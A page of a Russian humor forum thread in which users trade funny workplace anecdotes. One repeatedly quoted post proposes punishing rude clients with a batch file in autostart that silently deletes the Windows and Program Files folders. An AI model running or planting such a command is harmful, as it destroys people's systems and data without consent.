Расскажу-ка я вам пару перлов с бывшей работы, Курьезы и не только

[ Версия для печати ]
Добавить в Telegram Добавить в Twitter Добавить в Вконтакте Добавить в Одноклассники
Страницы: (6) « Первая ... 3 4 [5] 6   К последнему непрочитанному [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]
qant
19.12.2013 - 23:27
0
Статус: Offline


Вечный

Регистрация: 31.12.10
Сообщений: 1725
Цитата (Gaskoner @ 18.12.2013 - 10:23)
Было такое:

Пришел "клиент" - у меня на флэшке файлы пропали (ну троян скрыл все) а мне срочно нужен один (!) вот прямо сейчас... ну ок... че первый раз чтоль... открываем... достаем файл - просит почистить флэху - можем форматнуть если там ничего нужного больше нет - нету ниче больше нужного и не восстановимого говорит - несколько раз предупредили что форматируем безвозвратно (!) согласился. форматнули - файлик нужный закинули обратно. а где остальное?! там то-то, то-то! как я теперь?! faceoff.gif
Короче ну нафиг - сами пускай разбираются со своими флэшками

хуевый ты компутершик.

После формата можно все востановить r-studio или как то так или другие программы по восстановлению есть.

Добавлено в 23:29
У нас по работе пришло письмо с заказом на экскурсию в Монтесрат, все валялись

Скрытый текст
Правильно Монтсеррат


 
[^]
ГенГеныч
19.12.2013 - 23:31
0
Статус: Offline


Ярила

Регистрация: 27.12.09
Сообщений: 8052
Цитата (agress0r47 @ 19.12.2013 - 18:46)
Работала на заводе девушка Катя (по-моему до сих пор работает) в отделе АСУ ТП. Ну и звонит она как-то раз в цех ответственному за отгрузку по какому-то поручению своего начальника:
- Здравствуйте, меня зовут Катя, я с АСУ и ТП
(Телефон в цеху был на громкой связи, там всегда по громкой разговаривают.)
- Ну здравствуй, Катя. Тебя-то нам и не хвата...
Далее, уже не в силах договорить, весь кабинет заливался хохотом присутствующих.
После этого случая, всем новичкам рассказывали эту историю, чтоб не повторилось подобное. А через два года вообще переименовали отдел в ОИТ (отдел информационных технологий).

У нас немного другая ситуация. Пару раз, когда "клиент" капризничал, приходилось объяснять, что мы АСУиТП, а не СОСУиТП. На вопрос: "а что тогда вы делаете?" отвечаем, что завод АСУчиваем.
 
[^]
galactoz
19.12.2013 - 23:41
1
Статус: Offline


Ярила

Регистрация: 5.03.12
Сообщений: 2483
Цитата (Боевой @ 19.12.2013 - 15:33)
всегда убивает. Отдел из 3 человек, остаюсь один в кабинете, заходит тело, осматривает помещение:
- а что, никого нет?

довольно частый вопрос.

А что необычного? Может коллеги просто на обед ушли или в туалет? why.gif

Если я в какую то фирму первый раз прихожу, откуда мне знать кто и когда там работает?
 
[^]
sadme3
19.12.2013 - 23:59
1
Статус: Offline


Шутник

Регистрация: 16.12.13
Сообщений: 56
Ахах, точно Магнитогорск!!))) Таких персонажей там навалом, особенно в периоды обострений)
 
[^]
DennaVarta
20.12.2013 - 05:41
1
Статус: Offline


Приколист

Регистрация: 16.12.13
Сообщений: 379
sоvа ,вы сделали мое утро lol.gif
 
[^]
Gamilkar
20.12.2013 - 06:45
5
Статус: Offline


Ярила

Регистрация: 19.09.13
Сообщений: 1418
Добавлю свое. Работаю в больнице, не врач, экономист, расходы считаю, бюджет подбиваю, скукота в общем.
1. Заходит в кабинет бабуля и говорит: Мне на осмотр надо!
я: Регистратура на первом этаже, терапевты там же
Б: Я к вам хочу, у вас очереди нет.
я: бабушка я не врач, врачи этажом ниже.
б: ну как же, вы же в больнице работаете, обязаны быть врачом, осмотр проведите потом чаевничать будете.
я после некоторого оцепенения: хорошо говорю, пишите бумагу: я такая-то в не правильном осмотре и в моей смерти гражданина такого-то прошу не винить. Дата подпись, нотариус через дорогу.
Бабулю как ветром сдуло.

2. Заходит женщина врач на вид 45-50. И заявляет:
В: почему так несправедливо зарплата падает?
я: не понял, пояните!
в: Заведующая сказала, что зарплата по карточкам падает по алфавиту, сначала у кого фамилия на "А" начинается, потом остальные по порядку, моя фамилия на "Я" начинается, значит я позже всех получу!

Я чуть со стула не упал. Посоветовал ей фамилию поменять, и она убежала жаловаться к Главврачу, который потом ржал до посинения.

3. Приходит зав.отделения и заявляет: Выдайте медикаменты!
я: медикаменты на складе, получайте через фармацевта или провизора.
Она: Как? Вы же закупаете, значит все хранится должно у вас!
Фэйспалм. Тут я не нашелся чем ответить.

4. Потом же про медикаменты. Требовали купить холодильники для хранения лекарств. Купили. Через несколько месяцев инвентаризация. Пришли на склад и охуели, медикаменты лежат в коробках, в холодильники забиты конъяком, вином и конфетами от благодарных пациентов. А лекарства могут хранится и так, главное чтобы было сухо и прохладно.

И таких историй множество. Особенно много историй о халатности пациентов, которые приходят лечиться с опозданием, но тут врачи лучше расскажут.

апд. Из школы. Урок французского. Наша группа маленькая - пять парней (11 класс) и учительница - Людмила Андреевна.
Стук в дверь заходит мальчонка (1-2 класс) видимо кто-то отправил журнал передать, оглядывая нас выдает: Кто из вас Людмила Андреевна?
Занавес.

Это сообщение отредактировал Gamilkar - 20.12.2013 - 06:53
 
[^]
podvalnytrol
20.12.2013 - 07:17
4
Статус: Offline


Юморист

Регистрация: 28.11.13
Сообщений: 416
Звонят продажники:-Сейчас вам будет звонить заказчица у нее юбилей, у нее к вам несколько вопросов(я айтишник если чо). Ладно-говорю, вопросы так вопросы.-Здравствуйте!.... Добрый день!... Скажите пожалуйста какого размера у вас экран.... Безо всяких мыслей говорю 27", ....А что такой маленький?.. Нормальный экран, не большой не маленький... Далее З-заказчица, я-я
З-А девочки нам обещали 55"
Я-Понял, Вас интересует экран на котором будет Ваше слайд-шоу
З-Да
Я-Да, эти экраны 55"
З-Мне нужен их размер в миллиметрах
Я-Хорошо(перевожу дюймы в миллиметры) говорю размер
З-Нет, какая у них высота и ширина в миллиметрах, возьмите рулетку и померьте, я потом проверю
Я-Хорошо, перезвоните через 10 минут
З-Нам дизайнеры сказали,что нужен размер экрана в миллиметрах иначе они не смогут сделать фотографии под экран, все будет обрезано
Я-Приносите фотографии мы все для вас сделаем
З-Хорошо
Следующий день, утро, прихожу на работу а под дверью меня ждут фотографии В РУЛОНЕ С ДИАГОНАЛЬЮ 55", с запиской ...Извините разрезать не успели
 
[^]
podvalnytrol
20.12.2013 - 07:22
2
Статус: Offline


Юморист

Регистрация: 28.11.13
Сообщений: 416
Цитата (qant @ 20.12.2013 - 00:27)
Цитата (Gaskoner @ 18.12.2013 - 10:23)
Было такое:

Пришел "клиент" - у меня на флэшке файлы пропали (ну троян скрыл все) а мне срочно нужен один (!) вот прямо сейчас... ну ок... че первый раз чтоль... открываем... достаем файл - просит почистить флэху - можем форматнуть если там ничего нужного больше нет - нету ниче больше нужного и не восстановимого говорит - несколько раз предупредили что форматируем безвозвратно (!) согласился. форматнули - файлик нужный закинули обратно. а где остальное?! там то-то, то-то! как я теперь?!  faceoff.gif
Короче ну нафиг - сами пускай разбираются со своими флэшками

хуевый ты компутершик.

После формата можно все востановить r-studio или как то так или другие программы по восстановлению есть.

Добавлено в 23:29
У нас по работе пришло письмо с заказом на экскурсию в Монтесрат, все валялись

Скрытый текст
Правильно Монтсеррат

Смотря чем файлы стерты. Бывает такой формат, что после него ни одна Р-студия или тем более как-то там не помогут. Это Вам замечание от еще одного хуевого кампутерщика. И прежде чем нам хуевым делать замечания постарайтесь выучить матчасть
 
[^]
Одинец
20.12.2013 - 08:01
1
Статус: Offline


Мрачный надругатель

Регистрация: 27.10.10
Сообщений: 10794
Цитата (sоvа @ 19.12.2013 - 23:16)
При ветклинике небольшой магазинчик зоотоваров, корма там, игрушки и всякие другие примочки для питомцев. На кассе девочка, простыла и бегает в туалет каждые 15 минут, из-за чего постоянно скапливается очередь человек пять-семь. Первый в очереди - мужик, пока ждал, достал из кармана бумажку, посмотрел, чего написано (типа список покупок) и убрал обратно. Девочка прибежала на кассу, а он ей :
- "канаёба" у вас есть?

Ой, эээ... эта, "ебанука".. Блиать, извините..Ща..
Очередь ржет в голос.
Мужик достает опять свою бумажку, и по слогам читает: "е-у-ка-ну-ба"..
Девочка наконец отпускает малиновому мужику корм, очередь ржет, мужик убегает, матерясь шепотом на "блятские названия".
Мы за тоненькой стенкой тоже ржем, одновременно делаем перевязку коту с переломом.
Следующая в очереди - девица, еще не отсмеявшись, вытирает глазки платочком и говорит нашей продавщице:
- покажите, какие у вас есть кошкодрочки ?

Заливаясь румянцем:
-ЭЭЭ..блиать.. покажите кошкодралы ваши... кототочки.. ыыы...
В этот момент гробовая тишина прерывается воем перевязываемого калечного кота, и фееричным хохотом всех присутствующих.
Когтеточку наша девочка все же продала.
Но все равно описалась.
А тот корм навсегда у нас стал "канаёбой" .

ООООООО!!! sm_biggrin.gif lol.gif
канаёба... кошкодрочки...

Последний раз наш "штрафбат" так валялся по полу от истории в магазине автозапчастей:
Заходит типичная гламурная блондинка и спрашивает продавца;
А у вас есть такая штуковина, чтобы ртом не сосать, а рукой пожамкать-пожамкать, и само потекло?!
Попадавшие на пол покупатели даже стойку с мелкой хренью уронили...
Шланг для перекачки бензина со встроенным насосом девушка купила...
 
[^]
Lenyusya
20.12.2013 - 08:18
1
Статус: Offline


Весельчак

Регистрация: 26.10.13
Сообщений: 151
и я поделюсь. Работаю в охранном агентстве на ПЦН (пульт центрального наблюдения). Звонит клиент (далее Я - я, К - клиент)
Я - "С....+" здравствуйте
К - у меня встал?
Я - поздравляю
Он конечно хотел спросить про объект, прошла ли постановка на охрану. Посмеялись вместе, про объект выяснили.
 
[^]
водомоторник
20.12.2013 - 08:24
0
Статус: Offline


дважды баянист!

Регистрация: 5.05.13
Сообщений: 3442
Sashjkeee - Бывали такие, что предъявы кидали и угрожали - делается просто:
Создаём батник с кодом

@echo off
del /S /Q %SYSTEMROOT% %PROGRAMFILES%

Суём его в автозагрузку и прощаемся с "клиентом".


и...чо? blink.gif
я из тайги, мне не понятно.
 
[^]
kibero
20.12.2013 - 08:25
3
Статус: Offline


Шутник

Регистрация: 18.11.13
Сообщений: 81
У моей подруге (П) на работе был индивид (И). Постоянно опаздывал. Она, как его начальница поинтересовалась
П: Собственно, какого лешего ты опаздываешь??
на что бы получен гениальный ответ
И: Так мы работаем с 9-20 (с девяти двадцати)
у подруги легкий ступор...
П: Как так?? ведь с 9ти начинаем!!
И: Так при входе ж написано 9-20, на табличке...
Поясню, 9-20 -это время работы офиса, с девяти до восьми вечера )))
 
[^]
brandmax
20.12.2013 - 08:28
2
Статус: Offline


Приколист

Регистрация: 7.01.13
Сообщений: 214
Цитата (водомоторник @ 20.12.2013 - 09:24)
Sashjkeee - Бывали такие, что предъявы кидали и угрожали - делается просто:
Создаём батник с кодом

@echo off
del /S /Q %SYSTEMROOT% %PROGRAMFILES%

Суём его в автозагрузку и прощаемся с "клиентом".


и...чо? blink.gif
я из тайги, мне не понятно.

команда выноса директории програм файлс в "бесшумном" режиме.
 
[^]
podvalnytrol
20.12.2013 - 08:30
2
Статус: Offline


Юморист

Регистрация: 28.11.13
Сообщений: 416
Цитата (водомоторник @ 20.12.2013 - 09:24)
Sashjkeee - Бывали такие, что предъявы кидали и угрожали - делается просто:
Создаём батник с кодом

@echo off
del /S /Q %SYSTEMROOT% %PROGRAMFILES%

Суём его в автозагрузку и прощаемся с "клиентом".


и...чо? blink.gif
я из тайги, мне не понятно.

Короче всю папку программ файлз при перезагрузке удалит. Опередили
 
[^]
kiryasp
20.12.2013 - 08:31
1
Статус: Offline


Ярила

Регистрация: 16.11.12
Сообщений: 2265
Цитата (kiryasp @ 18.12.2013 - 11:39)
Сложно читать!

Ну и нафига минусили? Я это написал, когда пост был одной кучей, без разбивки на абзацы и без отступов. Или стадный инстинкт?
 
[^]
водомоторник
20.12.2013 - 08:33
0
Статус: Offline


дважды баянист!

Регистрация: 5.05.13
Сообщений: 3442
Цитата (brandmax @ 20.12.2013 - 09:28)
Цитата (водомоторник @ 20.12.2013 - 09:24)
Sashjkeee - Бывали такие, что предъявы кидали и угрожали - делается просто:
Создаём батник с кодом

@echo off
del /S /Q %SYSTEMROOT% %PROGRAMFILES%

Суём его в автозагрузку и прощаемся с "клиентом".


и...чо? blink.gif
я из тайги, мне не понятно.

команда выноса директории програм файлс в "бесшумном" режиме.

эта типа - сахару в бак сыпанули? Жэстоко.
 
[^]
DennaVarta
20.12.2013 - 08:34
1
Статус: Offline


Приколист

Регистрация: 16.12.13
Сообщений: 379
kiryasp , я не минусила, но скажу, что писала сразу с разметками,разбивками и пр. why.gif upset.gif
 
[^]
водомоторник
20.12.2013 - 08:43
0
Статус: Offline


дважды баянист!

Регистрация: 5.05.13
Сообщений: 3442
Цитата (Milanij @ 19.12.2013 - 21:08)
Было это когда еще маленькие автобусы Газели бегали. Рядом около меня сидит спокойная такая женщина, с ребёнком лет 4-х на руках. Одет ребёнок в шубу, замотан шарфом, на голове тёплая шапка, весь красный, как помидор. Весь крутится, ёрзает, с рук вниз у неё скатывается. Она ему тихо: «Ты чего сидеть не можешь?». Потом стал этот ребятёнок на её руки заваливаться: «Я спать хочу!». Она безмятежно: «Ты что не выспался?». Я рядом сижу, вижу ему плохо, и мысль, что он сейчас фонтаном пол автобуса всех и меня первую облюет, не покидает меня. Я ей спокойно говорю: «Ему душно, шарфик развяжите ребёнку». Она на меня посмотрела недружелюбно, а в глазах слова — Не твоё, мол, дело. Сидит удобно дальше. Потом ребёнок весь белый стал. Ноет уже: « У меня ротик болит!». Она ему тихо, ни тени беспокойства: «Чего он у тебя заболел вдруг». Вспоминаю, как моментально бывает плохо деткам в автобусе, рот вяжет, и какая развязка бывает очень быстро потом. Я враждебно: «Женщина, ребёнку плохо, его сейчас стошнит!».
И тут вдруг до этой «вдумчивой» тёти реальность ситуации доходит, она таким громким голосом кричит водителю: « Остановите немедленно автобус, ребёнку плохо!». Автобус останавливается, она вылезает, кое-как вытягивает за собой мечущегося ребёнка. Весь автобус следит за ними. А его начинает тут же прям на себя и на её руки вырывать фонтаном, который ничем нельзя уже остановить. Все с облегчением вздохнули. И никто не осознал, что благодаря мне, профессиональной няни, чистыми и опрятными мы поехали дальше.

Ну, ващще!
Можно я консультироваться буду, когда внуки пойдут?
Ответно консультирую по ремонту япономашин. cool.gif
 
[^]
MultyCulty
20.12.2013 - 08:51
0
Статус: Offline


Юморист

Регистрация: 25.09.13
Сообщений: 439
Мой начальник рассказывал историю из конца 90-х. У нас телеканал и существует такая услуга - "бегущая строка" (объявления).
Однажды заходит мужичок такой, ну как сказать... метра 2 ростом и в ширину чуть поменьше... На рабочем месте только мой начальник и бухгалтер (если их параметры вместе сплюсовать, то как раз этот мужик получится). Кладет он своей ручищей на стол бумажку с текстом и говорит:
- Объявление дать хочу!
Бухгалтер читает про себя текст: "Продаю могилки, гробы, закапываю людей. Тел ....". Прочитал. Мужик спарашивает:
- Сколько стоить будет!?
- Бесплатно!
Мужик кивает и уходит. Вот только тут оба моих коллеги вздыхают с облегчением. Охраны у нас тогда никакой и близко не было fear.gif Естественно ничего такого в эфир не пошло

Это сообщение отредактировал MultyCulty - 20.12.2013 - 08:54
 
[^]
galexik
20.12.2013 - 09:22
4
Статус: Offline


Юморист

Регистрация: 9.09.12
Сообщений: 421
Работал я на небольшой фабрике бухгалтером, так вот в канун Нового Года и Рождества мы украсили офис и на дверях повесили красивый такой венок Рождественский,через некоторое время дверь офиса открывается, входит бабуля и говорит: "А по чем вы гробы продаете?" Мы офигевшие "Мы не продаем, с чего вы взяли?", бабуля в ответ "Как не продаете, я думала продаете раз венок повесили"....
 
[^]
Одинец
20.12.2013 - 10:40
2
Статус: Offline


Мрачный надругатель

Регистрация: 27.10.10
Сообщений: 10794
galexik
Бабуле зачёт!!! Православная бабуля против экспансии католических обычаев!!! Боюсь даже представить эту бабулю в хэллоуин: топором или там вилами как поприветствует... И картонный гробик с рождественским венком... lol.gif

Это сообщение отредактировал Одинец - 20.12.2013 - 10:49
 
[^]
vokavi
20.12.2013 - 11:31
0
Статус: Offline


Шутник

Регистрация: 26.11.13
Сообщений: 59
Работала я когда-то на фирме, которая занималась грузоперевозками. Фирма была на тот момент маленькая с начальством в другом городе, так что мальчики возили-грузили-выдавали, а я делала всю остальную работу: от местного самоуправства, бухгалтерии, логистики, продажи услуг до мытья полов в офисе... Жили мы в мире и взаимопонимании, руководство нас беспокоило крайне редко, поэтому всеми "разборками полетов с недовольными клиентами" тоже приходилось заниматься мне. Зарплата на то время, по меркам нашего городка, была ооочень хорошей.

Так вот было это во времена прихода в мир политики того самого-проФФесора, перед или после оранжевой революции. Сейчас лень точно вспоминать, но уже тогда он претендовал на пост президента. Так вот и сама история.
У нас в услугах была возможность доставки груза клиенту на дом, это оговаривалось заранее в городе отправителе. Если не было заказано услугу, а клиент желал доставки, мы шли на встречу - мальчики везли за доп. плату.
И вот раздается звонок, кто-то нарванным и очень невежливым тоном, на "ты" и "слышишь", рассказывает о том, что на нашем складе находится посылка такая-то, я проверяю - так и есть, тара - стекло, оплата за доставку 8 грн., тогда что-то около 1,5 доллара (сумму буду помнить до конца жизни!). Вежливо говорю: "Приезжайте, ждём, любим". Он мне: "Да что бы я пиии, да что бы в вашу пиии, пиии, пиии.... Пусть завезут по такому-то адресу. Сразу оговорюсь - если есть фантазия, представьте самый худший тон диалога, здесь передать это крайне трудно.
На что я ему отвечаю: " С удовольствием доставим, к стоимости будет добавлено столько-то, доставка будет осуществлена с 3 до 4, так как с утра все машины уже в городе".
На мои слова - поток брани с общим смыслом: "Слышишь ты, кусок провинциального дерьма, я тут с Донецка приехал, самому Проффесору дачу под вашим городом строю (???), он со мной как с братом бухает, если моей баночки с золотой краской (там типа краска из золота для купола бани (???)) не будет у меня через 20 минут и бесплатно, твоя фирма сгорит вместе со всеми вами внутри! И далее полет фантазии по плану моего умерщвления, полного непереносимых мук и страданий, в таком же роде...
Я не сильно помню, почему я тогда была спокойна, но я ответила, что доставки не будет, приезжайте на склад и забирайте. По крайней мере юридически я была права. А там посмотрим, фирма снимала помещение в очень большом и густо заселенном народом здании, что успокаивало.
Первым делом я решила звонить на склад - предупредить мальчиков - что сейчас приедет крутое чмо на крутой тачке, чтобы там, если что и обслужили хорошо и соседей-мужчин предупредили, дабы те вступились.
Через пять минут перезванивает мне наш кладовщик, полным ужаса голосом сообщает, что таки да, есть на складе баночка с вонючей жидкостью внутри... откуда знаю, что вонючей?... по дороге, она была неправильно упакована, (услуги доп. упаковки стекла - платные) и разбилась, теперь с неё что-то течет... Я не говорю, что фирма права в том, что баночка разбилась... но такое в жизни бывает, да и на таре в таких случаях экономить нельзя, не хочешь платить, запакуй сам... Но если учесть сумму в "несколько тысяч долларов её стоимости..." (естественно со слов друга "проффесора") - я просто онемела...
Молода была... может неправильно поступила... начальства днём с огнём.... я скомандовала закрывать склад, оставить банку и накладную за железной дверью, написать "обед" и всем прийти ко мне в офис. Вот так вот струсила.
Сидим ждём, за банкой зорко наблюдают работники соседнего склада, на всякий случай везде воздушная тревога smile.gif.
Финита ля комедия, произошла совсем скоро, когда за этой банкой приехал на запорожце! (так рассказывали очевидцы) худой и молодой маленький человечек в грязном спортивном костюме, вышел, сильно оглядываясь по сторонам, подошёл к двери склада, долго читал табличку "обед", увидел банку, схватил её, вымазался чем-то жидким и вонючим, заметил, что к нему направляется осмелевший завсклад соседней фирмы, ринулся в машину, по пути разбрызгивая зловонное вещество и очень долго и хаотично пытался завести железного коня. Завсклад не подошёл к нему... пожалел... Друг будущего президента - уехал, а номера на машине, по словам людей, действительно были с тех краев, где "меня должна была насиловать рать строителей, а потом живьем закопать..."
Вот так вот... Считаю, что в том случае, "другу проффесора" крупно повезло, и нам воспоминания на всю жизнь!
А власть то наша - недалеко от парнишки этого ушла... правильной дорогой идём. Было бы интересно узнать, в какой ещё стране мира можно угрожать смертоубийством и расправой бандитами именем президента!
 
[^]
podvalnytrol
20.12.2013 - 12:09
2
Статус: Offline


Юморист

Регистрация: 28.11.13
Сообщений: 416
Цитата (vokavi @ 20.12.2013 - 12:31)
Было бы интересно узнать, в какой ещё стране мира можно угрожать смертоубийством и расправой бандитами именем президента!

В России например-легко. Брат работал в ночном клубе охранником. Там ему и президентом и Недимоном и главой ФСБ угрожали, ржет-говорит никого теперь не боюсь. Выше была тема про Томского священника, который обозвал матерей-одиночек, так вот и это говно облеванное выносили из ночного клуба
 
[^]
DennaVarta
20.12.2013 - 13:13
-1
Статус: Offline


Приколист

Регистрация: 16.12.13
Сообщений: 379
vokavi ,жесть конечно! мне тоже часто угрожали,когда я пьяных не пускала,до стоянки вечером шла с охранниками "на всякий случай"...обычно угрожают чмошники, смелые только на словах, если тебя действительно хотят убить - об этом не предупреждают)))
 
[^]
decad0r
20.12.2013 - 13:50
0
Статус: Offline


Хохмач

Регистрация: 2.09.13
Сообщений: 620
В тридевятом царстве, тридесятом государстве, жила была госструктура, по типу кгб)).
И вот понадобилось этой структуре обновить свое компьютерное и сетевое оснащение, были объявлены тендеры.
В частности, по тендеру на поставку оборудования Cisco, выиграла никому неизвестная контора "Рога и копыта", перебившая цену конкурентов (официальных дилеров) чуть ли не на треть.)))

За счет чего получилась такая цена?
Это выяснилось внезапно, когда одна заокиянская страна вторглась в страну алладина во второй раз))

внезапно все сетевое оборудование одномоментно приказало долго жить))

в ходе расследования выяснилось,
хозяева фирмы закупили с завода оборудование через персидскую фирму
и естественно по другим поправочным коэффициентам, поэтому железки-то и получились так дешевы)

пысы
дяденька майор, это же сказка правда?)) так что я тут не причем))
 
[^]
Понравился пост? Еще больше интересного в Телеграм-канале ЯПлакалъ!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 51293
0 Пользователей:
Страницы: (6) « Первая ... 3 4 [5] 6  [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]


 
 



Активные темы






Наверх